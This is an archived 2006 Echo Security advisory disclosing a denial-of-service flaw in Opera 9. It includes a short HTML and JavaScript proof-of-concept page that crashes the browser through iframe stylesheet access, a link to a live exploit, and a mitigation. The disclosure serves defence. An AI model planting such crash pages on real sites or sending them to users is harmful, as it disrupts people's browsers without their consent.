Echo Security Advisory 2006.35

2006-07-02T00:00:00
ID PACKETSTORM:47945
Type packetstorm
Reporter Echo Security
Modified 2006-07-02T00:00:00

Description

                                        
                                            `ECHO_ADV_35$2006  
  
------------------------------------------------------------------------------------  
[ECHO_ADV_35$2006] OPERA Web Browser 9 Denial OF Service  
------------------------------------------------------------------------------------  
  
Author : Ahmad Muammar W.K (a.k.a) y3dips  
Date Found : July, 1th 2006  
Location : Indonesia, Jakarta  
web : http://echo.or.id/adv/adv35-y3dips-2006.txt  
Critical Lvl : Moderated  
Impact : Browser will automatically shutdown  
Where : From Remote  
------------------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Opera Web Browser  
  
Application : Opera Web Browser  
version : Opera/9.00 (X11; Linux i686; U; en)  
Opera/9.00 (Windows NT 5:1;U;en)  
Some Other version are bot vulnerable and others are not tested,  
  
URL : http://opera.com  
Description :  
  
Vulnerability can be exploited by using <iframe> combining with javascript  
(documents stylesheet) to create an out-of-bounds memory access.  
  
------------------------------------------------------------------------------------  
  
Exploit Code:  
~~~~~~~~~~~~~~~~  
  
-----------------------opera9xploit.html----------------------  
  
<!-- Opera 9 DOS exploit, discovered by   
Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id)   
http://y3d1ps.blogspot.com  
//-->  
  
<html>  
<iframe src="palsu.php" name="fake" ></iframe>   
<script type="text/javascript">  
function mystyle() {  
if (fake.document.styleSheets.length == 1 )   
{  
f = document.forms["basicstyle"].elements;  
for (j = 0; j < f.length; j++)   
{  
if (f[j].name == 'fsmain');  
}   
}  
  
}  
mystyle();  
</script>  
</html>  
  
live exploit :  
  
http://y3dips.echo.or.id/opera9-dos/  
  
------------------------------------------------------------------------------------  
  
Solution:  
~~~~~~~~  
  
Disable Java Scipt execution from Opera Web browser  
  
  
------------------------------------------------------------------------------------  
Shoutz:  
~~~~~~~  
  
~ my beloved ana  
  
~ the_day, K-159 (keep researching), also all echo staff  
~ negative , naisenodni crew  
~ janex vind "waraxe" @ waraxe.us   
~ newbie_hacker[at]yahoogroups.com  
~ #e-c-h-o @irc.dal.net  
  
------------------------------------------------------------------------------------  
Contact:  
~~~~~~~~  
  
y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id  
Homepage: http://y3dips.echo.or.id/  
  
-------------------------------- [ EOF ] -------------------------------------------  
`